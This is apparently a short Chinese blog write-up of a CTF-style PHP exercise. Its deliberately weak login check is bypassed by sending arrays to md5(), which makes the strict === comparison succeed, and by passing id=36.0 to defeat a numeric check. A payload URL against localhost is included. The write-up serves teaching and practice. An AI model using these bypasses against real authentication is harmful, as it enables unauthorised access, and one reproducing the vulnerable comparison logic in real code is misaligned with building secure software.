zoukankan      html  css  js  c++  java
  • PHP绕过MD5真等于和数值绕过

     1 <?php
     2 $username=True;
     3 if(intval($_GET['username'])){
     4     preg_match("/[a-zA-Z0-9]*/", $_GET['username'],$username);
     5     if ($username) {
     6         echo "<center>username:USER</center><br/>";
     7     }
     8 }
     9 if (isset($_GET['name']) and isset($_GET['password'])){
    10     if ($_GET['name']==$_GET["password"])
    11         echo "账号密码不能一致";
    12     else if(md5($_GET["name"])===md5($_GET["password"]))
    13             if (is_numeric($_GET["id"])&&$_GET["id"]!=='36'&&!preg_match('/s/', $_GET["id"])) 
    14             {
    15                 if ($_GET["id"]==36)
    16                     die('<center>password:PASS</center>');
    17             }
    18         else
    19             echo "密码错误!";
    20 }
    21 
    22 ?>

    payload:

    http://127.0.0.1/test.php?username=12&name[]=1&password[]=2&id=36.0

    在第12行md5是===,所以不能利用md5开头是0e的字符串来绕过,但可以利用数组绕过

    在第13行因为$_GET["id"]!=='36'所有,可以利用36.0或者0x24(36的16进制)绕过,但第15行$_GET["id"]==36,所以只能用36.0绕过

  • 相关阅读:
    []Xcode中的iOS模拟器
    飞凌百套OK335xS-2开发平台免费申请
    FastDFS整合Nginx
    阿里云服务器Centos7安装FastDFS(一)
    进程调度
    Tomcat一
    SpringBoot初探
    Java中的日志框架
    JVM类加载之创建对象的过程
    JVM类加载机制二
  • 原文地址:https://www.cnblogs.com/dubhe-/p/9985805.html
Copyright © 2011-2022 走看看